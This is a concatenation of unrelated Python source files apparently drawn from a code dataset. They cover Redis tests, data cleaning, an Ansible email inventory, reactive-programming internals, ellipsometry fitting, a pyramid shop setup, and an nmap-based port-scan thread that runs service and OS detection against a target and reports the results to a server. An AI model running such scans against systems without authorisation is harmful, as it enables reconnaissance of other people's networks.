redis_key, new_namespace =common.construct_node( new_namespace,"relation 1","level_one","h1" )
print redis_key,new_namespace
print redis.hgetall(redis_key)
redis_key, new_namespace =common.construct_node( new_namespace,"relation 2","level_two","h2" )
print redis_key,new_namespace
print redis.hgetall(redis_key)
print "simple match"
print common.match( "relation 2","level_two","h2")
print "starting match"
print common.match( "*","level_two","h2",[["","head","head"]])
print "all the keys"
print redis.keys("*")
print "none of the keys"
common.delete_all()
print redis.keys("*")
| StarcoderdataPython |
342325 | <gh_stars>0
# Combine and Clean
import pandas as pd
temp_df = pd.read_csv('mergedARFINAL.csv')
#
temp_df = temp_df.drop_duplicates()
print(temp_df)
temp_df.to_csv('cleaned.csv')
| StarcoderdataPython |
3284193 | <filename>notifications/notifications.py
#!/usr/bin/env python
import argparse
import requests
import yaml
import os
try:
import json
except ImportError:
import simplejson as json
# Define the following environment variables:
# API_URL - The base url for the omp-data-api
# EMAIL_CONTENT_URL - Should be a url which points a yaml file with the email content to send
# The yaml file should cointain vars 'body' and 'title'.
# TAG - The tag you want to pull users and groups from.
# USERNAME - The email username from which you want to send notifications from
# PASSWORD - The password for said username
api_url = os.environ['API_URL']
email_content_url = os.environ['EMAIL_CONTENT_URL']
my_tag = os.environ['TAG']
username = os.environ['EMAIL_USERNAME']
password = os.<PASSWORD>['<PASSWORD>']
users_url = api_url + "/users"
class Inventory(object):
def __init__(self):
self.parse_cli_args()
self.inventory = {}
if self.args.list:
self.handle_list()
elif self.args.host != None:
self.handle_host()
print(json.dumps(self.inventory))
def handle_list(self):
my_tag_users = users_url + '/' + my_tag
r_users = requests.get(my_tag_users).json()
email_content = yaml.load(requests.get(email_content_url).text)
mail = {
"title": email_content['title'],
"body": email_content['body'],
"users": self.generate_user_info_list(r_users),
"email_to": self.generate_send_list(r_users),
"mail": {
"host": "smtp.gmail.com",
"port":"465",
"secure": "always",
"username": username,
"password": password,
"subtype": "html",
}
}
self.inventory = {'all': { "vars": mail}}
def generate_send_list(self, user_data):
send_list = []
for user in user_data:
send_list.append(user['email'])
return send_list
def generate_user_info_list(self, user_data):
user_info_list = []
for user in user_data:
user_info_list.append({
'first_name': user['first_name'],
'username': user['email'].split('@')[0],
'password': '<PASSWORD>',
'email': user['email'],
'notify_user': True
})
return user_info_list
def parse_cli_args(self):
parser = argparse.ArgumentParser(
description='Produce an Ansible Inventory from a file')
parser.add_argument('--list', action='store_true')
parser.add_argument('--host', action='store')
self.args = parser.parse_args()
Inventory()
| StarcoderdataPython |
230753 | import asyncio
import logging
import traceback
from abc import abstractmethod
from itertools import chain
from typing import Any, Dict, List, Set, Tuple
from stateflow import SilentError
from stateflow.common import Observable, T, ev, is_wrapper
from stateflow.decorators import DecoratedFunction
from stateflow.errors import ArgEvalError, EvalError, raise_need_async_eval
from stateflow.notifier import Notifier, ScopedName
class ArgsHelper:
def __init__(self, args, kwargs, signature, callable):
if signature:
# support default parameters
try:
bound_args = signature.bind(*args, **kwargs) # type: inspect.BoundArguments
bound_args.apply_defaults()
except Exception as e:
raise Exception('during binding {}{}'.format(callable.__name__, signature)) from e
args_names = list(signature.parameters)
self.args = bound_args.args
self.kwargs = bound_args.kwargs
self.args_names = args_names[0:len(self.args)]
self.args_names += [None] * (len(self.args) - len(self.args_names))
self.kwargs_indices = [(args_names.index(name) if name in args_names else None)
for name in self.kwargs.keys()]
else:
self.args = args
self.kwargs = kwargs
self.args_names = [None] * len(self.args)
self.kwargs_indices = [None] * len(self.kwargs)
def iterate_args(self):
return ((index, name, arg) for name, (index, arg) in zip(self.args_names, enumerate(self.args)))
def iterate_kwargs(self):
return ((index, name, arg) for index, (name, arg) in zip(self.kwargs_indices, self.kwargs.items()))
def eval_args(args_helper: ArgsHelper, pass_args, func_name, call_stack) -> Tuple[List[Any], Dict[str, Any]]:
def rewrap(index, name, arg):
try:
if index in pass_args or name in pass_args:
return arg
else:
return ev(arg)
except Exception as exception:
raise ArgEvalError(name or str(index), func_name, call_stack, exception)
return ([rewrap(index, name, arg) for index, name, arg in args_helper.iterate_args()],
{name: rewrap(index, name, arg) for index, name, arg in args_helper.iterate_kwargs()})
def observe(arg, notifier):
if isinstance(arg, Notifier):
return arg.add_observer(notifier)
else:
return arg.__notifier__.add_observer(notifier)
def maybe_observe(arg, notifier):
if is_wrapper(arg):
observe(arg, notifier)
def observe_args(args_helper: ArgsHelper, pass_args: Set[str], notifier):
for index, name, arg in chain(args_helper.iterate_args(), args_helper.iterate_kwargs()):
if index not in pass_args and name not in pass_args:
maybe_observe(arg, notifier)
class CallResult(Observable[T]):
def __init__(self, decorated: DecoratedFunction, args, kwargs):
with ScopedName(name=decorated.callable.__name__):
self.decorated = decorated # type: DecoratedFunction
self._notifier = Notifier()
# use dep_only_args
for name in decorated.decorator.dep_only_args:
if name in kwargs:
arg = kwargs.pop(name)
if isinstance(arg, (list, tuple)):
for a in arg:
observe(a, self.__notifier__)
else:
observe(arg, self.__notifier__)
# use other_deps
for dep in decorated.decorator.other_deps:
maybe_observe(dep, self.__notifier__)
self.args_helper = ArgsHelper(args, kwargs, decorated.signature, decorated.callable)
self.args = self.args_helper.args
self.kwargs = self.args_helper.kwargs
self._update_in_progress = False
self.call_stack = traceback.extract_stack()[:-3]
observe_args(self.args_helper, self.decorated.decorator.pass_args, self.__notifier__)
@property
def __notifier__(self):
return self._notifier
# @contextmanager
# def _handle_exception(self, reraise=True):
# try:
# yield
#
# except Exception as e:
# if isinstance(e, HideStackHelper):
# e = e.__cause__
# if isinstance(e, SilentError):
# e = e.__cause__
# reraise = False # SilentError is not re-raised by definition
# self._exception = e
# if reraise:
# raise HideStackHelper() from e
def _call(self):
"""
returns one of:
- an Observable,
- a raw value (must be wrapped into Observable)
- a coroutine (must be awaited),
- a context manager (must be __enter__ed to obtain value, then __exited__ before next __enter__)
- an async context manager (a mix of above)
"""
assert self._update_in_progress == False, 'circular dependency containing "{}" called at:\n{}'.format(
self.callable.__name__, self.call_stack)
try:
self._update_in_progress = True
args, kwargs = eval_args(self.args_helper, self.decorated.decorator.pass_args,
self.decorated.callable.__name__, self.call_stack)
try:
return self.decorated.really_call(args, kwargs)
except SilentError as e: # SilentError may be thrown from the function body too (e.g. from validators)
# raise SilentError(EvalError(self.call_stack, e))
raise e
except Exception as e:
raise EvalError(self.call_stack, e)
finally:
self._update_in_progress = False
@abstractmethod
def __eval__(self):
pass
class SyncCallResult(CallResult[T]):
def __eval__(self):
return self._call()
class AsyncCallResult(CallResult[T]):
async def __aeval__(self):
return await self._call()
def __eval__(self):
raise Exception("called __eval__ on the value that depends on an asynchronously evaluated value; use __aeval__")
class CmCallResult(CallResult[T]):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.cm = None
def __eval__(self):
self._cleanup()
self.cm = self._call()
return self.cm.__enter__()
def __del__(self):
self._cleanup()
def _cleanup(self):
try:
if self.cm:
self.cm.__exit__(None, None, None)
self.cm = None
except Exception:
logging.exception("ignoring exception in cleanup")
class AsyncCmCallResult(CallResult[T]):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.cm = None
async def __aeval__(self):
await self._cleanup()
self.cm = self._call()
return await self.cm.__aenter__()
def __del__(self):
asyncio.ensure_future(self._cleanup())
async def _cleanup(self):
try:
if self.cm:
cm = self.cm
self.cm = None
await cm.__aexit__(None, None, None)
except Exception:
logging.exception("ignoring exception in cleanup")
def __eval__(self):
raise_need_async_eval()
| StarcoderdataPython |
1639237 | <reponame>Enucatl/machine-learning-aging-brains
import apache_beam as beam
import agingbrains
import agingbrains.io
import agingbrains.read_gender
import agingbrains.voxel_fit
class CorrelationOptions(beam.utils.options.PipelineOptions):
@classmethod
def _add_argparse_args(cls, parser):
parser.add_argument(
"--input",
dest="input",
default="data/set_train/train_1*.nii"
)
parser.add_argument(
"--genders",
dest="genders",
default="data/mlp3-targets.csv"
)
parser.add_argument(
"--output",
dest="output",
default="output/GENDER_OUTPUT"
)
parser.add_argument(
"--test_slice",
dest="test_slice",
action="store_true"
)
if __name__ == "__main__":
pipeline_options = beam.utils.options.PipelineOptions()
p = beam.Pipeline(options=pipeline_options)
options = pipeline_options.view_as(CorrelationOptions)
datasets = p | "ReadTrainDataset" >> agingbrains.io.ReadNifti1(
options.input,
test_slice=options.test_slice)
genders = p | "ReadGenders" >> agingbrains.read_gender.ReadGender(
options.genders, options.input)
brain_correlation_map = ({"data": datasets, "gender": genders}
| "GroupWithGender" >> beam.CoGroupByKey()
| beam.core.FlatMap(agingbrains.voxel_fit.emit_voxels)
| beam.GroupByKey()
| beam.core.Map(agingbrains.voxel_fit.fisher_score)
| beam.core.Map(agingbrains.io.save_correlation)
| beam.io.WriteToText(
options.output,
compression_type=beam.io.fileio.CompressionTypes.GZIP,
file_name_suffix=".tgz")
)
p.run()
| StarcoderdataPython |
5148781 | # -*- coding: utf-8 -*-
"""
hangulize.normalization
~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2017 by <NAME>
:license: BSD, see LICENSE for more details.
"""
import unicodedata
__all__ = ['normalize_roman']
def normalize_roman(string, additional=None):
"""Removes diacritics from the string and converts to lowercase::
>>> normalize_roman(u'Eèé')
u'eee'
"""
if additional:
safe = list(additional.keys()) + list(additional.values())
def gen():
for c in string:
if c not in safe:
yield normalize_roman(c)
elif c in additional:
yield additional[c]
else:
yield c
return ''.join(gen())
chars = []
for c in string:
if unicodedata.category(c) == 'Lo':
chars.append(c)
else:
nor = unicodedata.normalize('NFD', c)
chars.extend(x for x in nor if unicodedata.category(x) != 'Mn')
return ''.join(chars).lower()
| StarcoderdataPython |
1969468 | import imp
import os
try:
import cpyext
except ImportError:
raise ImportError("No module named '_ctypes_test'")
try:
import _ctypes
_ctypes.PyObj_FromPtr = None
del _ctypes
except ImportError:
pass # obscure condition of _ctypes_test.py being imported by py.test
else:
import _pypy_testcapi
cfile = '_ctypes_test.c'
thisdir = os.path.dirname(__file__)
output_dir = _pypy_testcapi.get_hashed_dir(os.path.join(thisdir, cfile))
try:
fp, filename, description = imp.find_module('_ctypes_test', path=[output_dir])
with fp:
imp.load_module('_ctypes_test', fp, filename, description)
except ImportError:
if os.name == 'nt':
# hack around finding compilers on win32
try:
import setuptools
except ImportError:
pass
print('could not find _ctypes_test in %s' % output_dir)
_pypy_testcapi.compile_shared('_ctypes_test.c', '_ctypes_test', output_dir)
| StarcoderdataPython |
4823810 | <reponame>data-stories/chart-experiment<filename>demo/sample_batches.py
sample_batches ={
"0": {
"pie": [
["MG", "dd06", "sano", "sm0", "ftfa", "fs16", "llcl", "pano", "we00", "ro270","ad95"],
["CR", "dd06", "sa00", "sm1", "ftse", "fs18", "llcr", "pa05", "we05", "ro000", "ad07"],
["CM", "dd12", "sano", "sm0", "ftns", "fs12", "llcl", "pano", "we05", "ro090", "ad11"],
["MB", "dd12", "sa00", "sm1", "ftns", "fs14", "llcr", "pa03", "we10", "ro000", "ad95"]
],
"donut": [
["MG", "dd06", "sano", "sm0", "ftfa", "fs16", "llcl", "pano", "we00", "ro270","ad95","dh2"],
["CL", "dd06", "sa00", "sm1", "ftse", "fs18", "llcr", "pa05", "we05", "ro000", "ad07","dh5"],
["CM", "dd12", "sano", "sm0", "ftns", "fs12", "llcl", "pano", "we05", "ro090", "ad11","dh2"],
["MB", "dd12", "sa00", "sm1", "ftns", "fs14", "llcr", "pa03", "we10", "ro000", "ad95", "dh8"]
],
"bar": [
["MG", "dd06", "sano", "sm0", "ftfa", "fs16", "llul", "pano", "e00a0", "bw6", "bs000", "boh", "gr0y"],
["CL", "dd06", "sa00", "sm1", "ftse", "fs18", "llur", "pa05", "e00a1", "bw4", "bs000", "bov", "gr0y"],
["CM", "dd12", "sano", "sm0", "ftns", "fs12", "llul", "pano", "e10a1", "bw6", "bs000", "boh", "gr00"],
["MB", "dd12", "sa00", "sm1", "ftns", "fs14", "llur", "pa03", "e11a1", "bw8", "bs000", "bov", "gr00"]
]
},
"1": {
"pie": [
["MG", "dd06", "sano", "sm0", "ftfa", "fs16", "llcl", "pano", "we00", "ro270","ad95"],
["CL", "dd06", "sa00", "sm1", "ftse", "fs18", "llcr", "pa05", "we05", "ro000", "ad07"],
["CM", "dd12", "sano", "sm0", "ftns", "fs12", "llcl", "pano", "we05", "ro090", "ad11"],
["MB", "dd12", "sa00", "sm1", "ftns", "fs14", "llcr", "pa03", "we10", "ro000", "ad95"]
],
"donut": [
["MR", "dd06", "sano", "sm0", "ftfa", "fs16", "llcl", "pano", "we00", "ro270","ad95","dh2"],
["CL", "dd06", "sa00", "sm1", "ftse", "fs18", "llcr", "pa05", "we05", "ro000", "ad07","dh5"],
["CM", "dd12", "sano", "sm0", "ftns", "fs12", "llcl", "pano", "we05", "ro090", "ad11","dh2"],
["MB", "dd12", "sa00", "sm1", "ftns", "fs14", "llcr", "pa03", "we10", "ro000", "ad95", "dh8"]
],
"bar": [
["MG", "dd06", "sano", "sm0", "ftfa", "fs16", "llul", "pano", "e00a0", "bw6", "bs000", "boh", "gr0y"],
["CR", "dd06", "sa00", "sm1", "ftse", "fs18", "llur", "pa05", "e00a1", "bw4", "bs000", "bov", "gr0y"],
["CM", "dd12", "sano", "sm0", "ftns", "fs12", "llul", "pano", "e10a1", "bw6", "bs000", "boh", "gr00"],
["MB", "dd12", "sa00", "sm1", "ftns", "fs14", "llur", "pa03", "e11a1", "bw8", "bs000", "bov", "gr00"]
]
},
"2": {
"pie": [
["MR", "dd06", "sano", "sm0", "ftns", "fs16", "llcl", "pano", "we00", "ro270","ad95"],
["CL", "dd06", "sa00", "sm1", "ftse", "fs18", "llcr", "pa05", "we05", "ro000", "ad07"],
["CM", "dd12", "sano", "sm0", "ftns", "fs12", "llcl", "pano", "we05", "ro090", "ad11"],
["MB", "dd12", "sa00", "sm1", "ftns", "fs14", "llcr", "pa03", "we10", "ro000", "ad95"]
],
"donut": [
["MR", "dd06", "sano", "sm0", "ftfa", "fs16", "llcl", "pano", "we00", "ro270","ad95","dh2"],
["CR", "dd06", "sa00", "sm1", "ftse", "fs18", "llcr", "pa05", "we05", "ro000", "ad07","dh5"],
["CM", "dd12", "sano", "sm0", "ftns", "fs12", "llcl", "pano", "we05", "ro090", "ad11","dh2"],
["MB", "dd12", "sa00", "sm1", "ftns", "fs14", "llcr", "pa03", "we10", "ro000", "ad95", "dh8"]
],
"bar": [
["MG", "dd06", "sano", "sm0", "ftfa", "fs16", "llul", "pano", "e00a0", "bw6", "bs000", "boh", "gr0y"],
["CL", "dd06", "sa00", "sm1", "ftse", "fs18", "llur", "pa05", "e00a1", "bw4", "bs000", "bov", "gr0y"],
["CM", "dd12", "sano", "sm0", "ftns", "fs12", "llul", "pano", "e10a1", "bw6", "bs000", "boh", "gr00"],
["MB", "dd12", "sa00", "sm1", "ftns", "fs14", "llur", "pa03", "e11a1", "bw8", "bs000", "bov", "gr00"]
]
}
} | StarcoderdataPython |
3355559 | <gh_stars>1-10
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import re
class AtWikiStripper(object):
# Comment: `// comment`
COMMENT = re.compile(r'^//')
# Inline annotation: `&color(#999999){text}`, `&nicovideo(url)`
INLINE_ANN = re.compile(r'&[a-z_]+\(([^()]*?)\)({([^{}]+?)})?'), 3
# Inline links: `[[page]]`, `[[alias>URL]]`
INLINE_LINK = re.compile(r'\[\[(.+?)((>|>>)(.+?))?\]\]'), 1
# Inline italic: `'''text'''`
INLINE_ITALIC = re.compile(r'\'\'\'(.+?)\'\'\''), 1
# Inline bold: `''text''`
INLINE_BOLD = re.compile(r'\'\'(.+?)\'\''), 1
# Inline del: `%%text%%`
INLINE_DEL = re.compile(r'%%(.+?)%%'), 1
# Line annotation: `#right(){text}`, `#comment()`, `#region`
LINE_ANN = re.compile(r'^#[a-z_]+(\(([^()]*?)\)({([^{}]+?)})?)?\s*$'), 4
# Line horizontal line: `----`
LINE_HR = re.compile(r'^----\s*()$'), 1
# Line item list and heading: `+foo`, `-foo`, `*foo`
LINE_ITEMLIST = re.compile(r'^(\*+|\++|-+)(.+)$'), 2
# Line quote: `>text`
LINE_QUOTE = re.compile(r'^>+(.+)$'), 1
# Line formatted: ` text`
LINE_PRE = re.compile(r'^ (.+)$'), 1
# Block annotation: `#exk(){{{` ... `}}}`
BLOCK_BEGIN_ANN = re.compile(r'^#[a-z_]+\(([^{}()]*?)\)({+)\s*$')
BLOCK_END_ANN = re.compile(r'^(}+)\s*$')
def __init__(self, source):
self._source = source
def _inline_strip(self, line, pattern, group):
while True:
prev = line
# Note: prior to Python 3.5, use of backreference of nonmatching group
# in replacement string raises exception.
line = pattern.sub(lambda m: m.group(group), line)
if prev == line: return line
def _line_process(self, buf, line, pattern, group):
prev = line
line = pattern.sub(lambda m: m.group(group), line)
if prev == line: return False
buf.append(line)
return True
def text(self):
ret = []
lines = self._source.splitlines()
block_level = 0
for line in lines:
if self.COMMENT.match(line): continue
line = self._inline_strip(line, *self.INLINE_ANN)
line = self._inline_strip(line, *self.INLINE_LINK)
line = self._inline_strip(line, *self.INLINE_ITALIC)
line = self._inline_strip(line, *self.INLINE_BOLD)
line = self._inline_strip(line, *self.INLINE_DEL)
if self._line_process(ret, line, *self.LINE_ANN): continue
if self._line_process(ret, line, *self.LINE_HR): continue
if self._line_process(ret, line, *self.LINE_ITEMLIST): continue
if self._line_process(ret, line, *self.LINE_QUOTE): continue
if self._line_process(ret, line, *self.LINE_PRE): continue
if block_level == 0:
m = self.BLOCK_BEGIN_ANN.match(line)
if m:
block_level = len(m.group(2))
continue
else:
m = self.BLOCK_END_ANN.match(line)
if m and len(m.group(1)) == block_level:
block_level = 0
continue
ret.append(line)
return '\n'.join(ret)
| StarcoderdataPython |
3232253 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Script used to analyze the ellipsometry data recorded on the Picometer Light ellipsometer available at the
Partneship for soft condensed matter at the Institut Laue-Langevin, Grenoble. The script uses the tmm package
developed by <NAME> (see https://pypi.org/project/tmm/ for full details) and the lmfit package
(https://lmfit.github.io/lmfit-py/).
@author: <NAME>
"""
date = '2020.03.24'
version = '0.2'
import pandas as pd
import matplotlib.pyplot as plt
import os
import itertools
import numpy as np
from lmfit import minimize, Parameters, fit_report
basepath = '/data/owncloud/PostDoc-ILL/Lukas/Ellipsometry/200221ellipso/' #Folder where the datafiles are contained.
from tmm import ellips
fit_xy = False #are the data in xy fitted? Otherwise delta and psi will be fitted.
degree = np.pi/180
wl = 632.8 #Laser wavelength, given in nm
''' define the model here. For each layer, a couple of parameters d_i and n_i need to be defined.
Set the guessed value for the parameter, its limits and if it has to be optmized or not. '''
fit_params = Parameters()
fit_params.add('d0', value= np.inf, vary=False) #Incoming medium thickness (eg air or water)
fit_params.add('n0', value= 1, vary=False) #Incoming medium refractive index
fit_params.add('d1', value= 2.1, vary=True, min = 20.0, max = 100) #1st layer thickness, nm
fit_params.add('n1', value= 1.55, vary=True, min=1.3, max=1.6) #1st layer refractive index
#fit_params.add('d11', value= 50.1, vary=True, min = 0.0, max = 200) #1st layer thickness, nm
#fit_params.add('n11', value= 1.55, vary=True, min=1.2, max=1.6) #1st layer refractive index
fit_params.add('d2', value= 5.0, vary=False) #2st layer thickness, nm (SiO2)
fit_params.add('n2', value= 1.46, vary=False) #2st layer refractive index
fit_params.add('d3', value= np.inf, vary=False) #2st layer thickness, nm (Si)
fit_params.add('n3', value= 3.87, vary=False) #2st layer refractive index
elements = list(itertools.chain(*[(key, str(key)+'_err') for key in fit_params.valuesdict()]))
fitted_params = pd.DataFrame(columns=elements) #Pandas DataFrame where all fit parameters are saved.
def ell(pars,ang,wl):
'''takes refractive index and layer thickness and returns psi, delta'''
vals = pars.valuesdict()
ns = [vals[key] for key in vals if 'n' in key] #List of refractive indices, starting from air to the substrate
ds = [vals[key] for key in vals if 'd' in key] #List of refractive indices, starting from air to the substrate
psi = [ellips(ns, ds, i*degree, wl)['psi'] for i in ang]
delta = np.pi - np.array([ellips(ns, ds, i*degree, wl)['Delta'] for i in ang]) #in nm
return psi, delta
def psidelta_in_xy(psi,delta):
''' Converts Psi and Delta in x and y'''
x = -np.sin(2*np.asarray(psi))*np.cos(delta)
y = np.sin(2*np.asarray(psi))*np.sin(delta)
return x, y
def fcn2min(pars, data):
psi, delta = ell(pars,data[:,0],wl)
if fit_xy is True:
x, y = psidelta_in_xy(psi, delta)
res1 = data[:,1] - psi
res2 = data[:,2] - psi
else:
res1 = data[:,1] - psi
res2 = data[:,2] - delta
res = np.concatenate([res1, res2])
return res
plt.clf()
with open(os.path.join(basepath,'fit_out.csv'), 'w+') as f:
f.write('#Data analyzed with pyEll, version {} from {}. \n'.format(version, date))
for filename in sorted(os.listdir(basepath)):
if filename.endswith(".txt"):
if fit_xy is True:
if filename.endswith("epd.txt") is False:
data = np.loadtxt(basepath+filename, skiprows=1, usecols=(5,0,1), unpack=False)
fcn2min(fit_params, data)
out = minimize(fcn2min, fit_params, kws = {'data': data}, method='leastsq')
psi, delta = ell(out.params,data[:,0],wl)
x, y = psidelta_in_xy(psi, delta)
print(fit_report(out))
plt.figure()
plt.plot(data[:,0], np.asarray(y[:]), label='y')
plt.plot(data[:,0], np.asarray(x[:]), label='x')
plt.xlabel('Angle / deg')
plt.ylabel('x, y')
plt.plot(data[:,0], data[:,1], 'ro')
plt.plot(data[:,0], data[:,2], 'bs')
plt.legend()
plt.savefig(os.path.join(basepath, filename.split('_xy')[0] + '.pdf'))
plt.close()
outfile = 'fit-' + filename.split('_xy')[0] + '.dat'
np.savetxt(os.path.join(basepath, outfile), np.transpose([data[:,0], np.asarray(delta[:])*180./np.pi, np.asarray(psi[:])*180./np.pi]), delimiter="\t")
# out_values = out.params.valuesdict()
out_values = {}
for key in out.params.valuesdict():
out_values[key] = out.params[key].value
out_values[str(key)+'_err'] = out.params[key].stderr
fitted_params.loc[filename.split('_')[0]] = out_values
# for key in out_values if 'n' in key:
# fit_params[filename.split('_')[0]][key] = out.params[key].value
# fit_params[filename.split('_')[0]][str(key)+ '_err'] = out.params[key].value
# key: ,
# str(key) + '_err': out.params[key].stderr
# with open(os.path.join(basepath,'fit_out.out'), 'a') as f:
# f.write('{:s} \t {:.2f} \t {:.2f} \t {:.3f} \t {:.3f} \n'.format(filename.split('_')[0], out.params['d1'].value, out.params['d1'].stderr, out.params['n1'].value, out.params['n1'].stderr))
else:
if filename.endswith("epd.txt"):
print(filename)
tmp = np.loadtxt(basepath+filename, skiprows=1, usecols=(5,0,1), unpack=False)
data = tmp[~np.isnan(tmp).any(axis=1)] #all nanvalues are dropped.
fcn2min(fit_params, data)
#print(data)
out = minimize(fcn2min, fit_params, kws = {'data': data}, method='leastsq')
psi, delta = ell(out.params,data[:,0],wl)
print(fit_report(out))
plt.figure()
plt.plot(data[:,0], np.asarray(psi[:])*180./np.pi)
plt.plot(data[:,0], np.asarray(delta[:])*180./np.pi)
plt.plot(data[:,0], data[:,1]*180./np.pi, 'ro', label='psi')
plt.plot(data[:,0], data[:,2]*180./np.pi, 'bs', label='delta')
plt.xlabel('Angle / deg')
plt.ylabel('Psi, Delta / deg')
plt.legend()
plt.savefig(os.path.join(basepath, filename.split('_epd')[0] + '.pdf'))
plt.close()
outfile = 'fit-' + filename.split('_epd')[0] + '.dat'
np.savetxt(os.path.join(basepath,outfile), np.transpose([data[:,0], np.asarray(delta[:])*180./np.pi, np.asarray(psi[:])*180./np.pi]), delimiter="\t")
out_values = {}
for key in out.params.valuesdict():
out_values[key] = out.params[key].value
out_values[str(key)+'_err'] = out.params[key].stderr
fitted_params.loc[filename.split('_')[0]] = out_values
# with open(os.path.join(basepath,'fit_out.out'), 'a') as f:
# f.write('{:s} \t {:.2f} \t {:.2f} \t {:.3f} \t {:.3f} \n'.format(filename.split('_')[0], out.params['d1'].value, out.params['d1'].stderr, out.params['n1'].value, out.params['n1'].stderr))
fitted_params.to_csv(os.path.join(basepath,'fit_out.csv'), mode='a') | StarcoderdataPython |
5158293 | import unittest
from src.data import TBDatabase
class TestTBDatabase(unittest.TestCase):
def test_create_schema(self):
db = TBDatabase('test.db')
db.create_schema()
db.close()
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
6695819 | <filename>pyramid/MyShop/myshop/scripts/initializedb.py
import os
import sys
import transaction
from sqlalchemy import engine_from_config
from pyramid.paster import (
get_appsettings,
setup_logging,
)
from pyramid.scripts.common import parse_vars
from ..models import (
DBSession,
#MyModel,
User,
Group,
Base,
Permission, Category, Item)
def usage(argv):
cmd = os.path.basename(argv[0])
print('usage: %s <config_uri> [var=value]\n'
'(example: "%s development.ini")' % (cmd, cmd))
sys.exit(1)
def main(argv=sys.argv):
if len(argv) < 2:
usage(argv)
config_uri = argv[1]
options = parse_vars(argv[2:])
setup_logging(config_uri)
settings = get_appsettings(config_uri, options=options)
engine = engine_from_config(settings, 'sqlalchemy.')
DBSession.configure(bind=engine)
Base.metadata.create_all(engine)
with transaction.manager:
#model = MyModel(name='one', value=1)
#DBSession.add(model)
perm_item_manage = Permission()
perm_item_manage.name = 'item'
DBSession.add(perm_item_manage)
perm_user_manage = Permission()
perm_user_manage.name = 'user'
DBSession.add(perm_user_manage)
perm_order_manage = Permission()
perm_order_manage.name = 'order'
DBSession.add(perm_order_manage)
gadmin = Group()
gadmin.name = 'Administrators'
gadmin.permissions.append(perm_item_manage)
gadmin.permissions.append(perm_order_manage)
gadmin.permissions.append(perm_user_manage)
DBSession.add(gadmin)
admin = User()
admin.name = 'admin'
admin.password = '<PASSWORD>'
admin.email = '<EMAIL>'
admin.group = gadmin
DBSession.add(admin)
cat_food = Category()
cat_food.name = 'Food'
DBSession.add(cat_food)
cat_fruit = Category()
cat_fruit.name = 'Fruit'
cat_fruit.parent = cat_food
DBSession.add(cat_fruit)
cat_vegetable = Category()
cat_vegetable.name = 'Vegetable'
cat_vegetable.parent = cat_food
DBSession.add(cat_vegetable)
iapple = Item()
iapple.name = 'Apple'
iapple.description = '<h2>This is a <span style="color:red;">red</span> apple</h2>'
iapple.price = 1.3
iapple.category = cat_fruit
DBSession.add(iapple)
| StarcoderdataPython |
6409497 | import os
import csv
csvpath = os.path.join('Resources', 'budget_data.csv')
average_change = 0
with open(csvpath) as csvfile:
csvreader = csv.reader(csvfile, delimiter=',')
# Gets the header info
csv_header = next(csvreader)
# initialize variables using first row of data
first_row = next(csvreader)
greatest_profit = int(first_row[1])
greatest_loss = int(first_row[1])
total_months = 1
total_profit = int(first_row[1])
# Loops through the rows
for row in csvreader:
current_profit = int(row[1])
# keep track of # of months (this is also total number of rows)
total_months = total_months + 1
total_profit = total_profit + current_profit
if (greatest_profit < current_profit):
greatest_profit = current_profit
profit_month = row[0]
if (greatest_loss > current_profit):
greatest_loss = current_profit
loss_month = row[0]
average_change = round(total_profit / total_months, 2)
print(f"Total months: {total_months}")
print(f"Total: ${total_profit}")
print(f"Average Change: ${average_change}")
print(f"Greatest Increase in Profits: {profit_month} (${greatest_profit})")
print(f"Greatest Decrease in Profits: {loss_month} (${greatest_loss})")
# Redoing all the print statements into output file
output_path = os.path.join("Results.csv")
with open(output_path, 'w', newline='') as csvfile:
# Initialize csv.writer
csvwriter = csv.writer(csvfile)
csvwriter.writerow([f"Total months: {total_months}"])
csvwriter.writerow([f"Total: ${total_profit}"])
csvwriter.writerow([f"Average Change: ${average_change}"])
csvwriter.writerow([f"Greatest Increase in Profits: {profit_month} (${greatest_profit})"])
csvwriter.writerow([f"Greatest Decrease in Profits: {loss_month} (${greatest_loss})"])
| StarcoderdataPython |
1733909 | <filename>word2description/management/commands/set_games_as_finished.py
'''
Created on Mar 17, 2018
@author: alice
'''
from datetime import datetime, timedelta
from django.core.management.base import BaseCommand
from word2description.models import Game
def parse_time(time_str):
t = datetime.strptime(time_str,"%H:%M:%S")
return timedelta(hours=t.hour, minutes=t.minute, seconds=t.second)
class Command(BaseCommand):
def add_arguments(self, parser):
parser.add_argument(
'--inactive_period',
dest='inactive_period',
help='Set game to finished after an inactive period.'
)
def handle(self, *args, **options):
try:
inactive = parse_time(options['inactive_period'])
Game.objects.filter(end__lte=datetime.utcnow()-inactive).update(finished=True)
except KeyError:
pass | StarcoderdataPython |
4838751 | from datetime import datetime
from pprint import pprint
from socket import gethostname
from threading import Thread
import nmap
from util import send_portscan
class PortscanThread(Thread):
def __init__(self, destination, scan_info):
super().__init__()
print(f"PortscanThread: initializing thread object: scan_info={scan_info}")
if (
"target" not in scan_info
or "token" not in scan_info
):
print(f"PortscanThread: missing information in scan_info: {scan_info}")
return
self.destination = destination
self.target = scan_info["target"]
self.token = scan_info["token"]
self.port_range = "1-1024"
# self.scan_arguments = "-sT -sU -O --host-time 300"
self.scan_arguments = "-sT -sV -O --host-time 300"
# self.scan_arguments = "--host-time 300"
def process_scan(self, scan_output):
status_code = send_portscan(
gethostname(),
self.destination,
self.target,
self.token,
str(datetime.now())[:-1],
scan_output,
)
print(f"\nPortscanThread: portscan sent, result={status_code}\n")
def run(self):
print(f"PortscanThread: starting portscan: target = {self.target}")
print(f"PortscanThread: starting portscan: port_range= {self.port_range}")
print(f"PortscanThread: starting portscan: arguments = {self.scan_arguments}")
nm = nmap.PortScanner()
scan_output = nm.scan(
self.target, self.port_range, arguments=self.scan_arguments
)
pprint(scan_output)
self.process_scan(scan_output)
print(f"\n\n-----> PortscanThread: competed portscan")
| StarcoderdataPython |
6453034 | <filename>pose/networks/gcn.py
import torch
import torch.nn.functional as F
from torch import nn
from torchvision import models
from pose.utils import initialize_weights
from .config import res152_path
# many are borrowed from https://github.com/ycszen/pytorch-ss/blob/master/gcn.py
class _GlobalConvModule(nn.Module):
def __init__(self, in_dim, out_dim, kernel_size):
super(_GlobalConvModule, self).__init__()
pad0 = (kernel_size[0] - 1) / 2
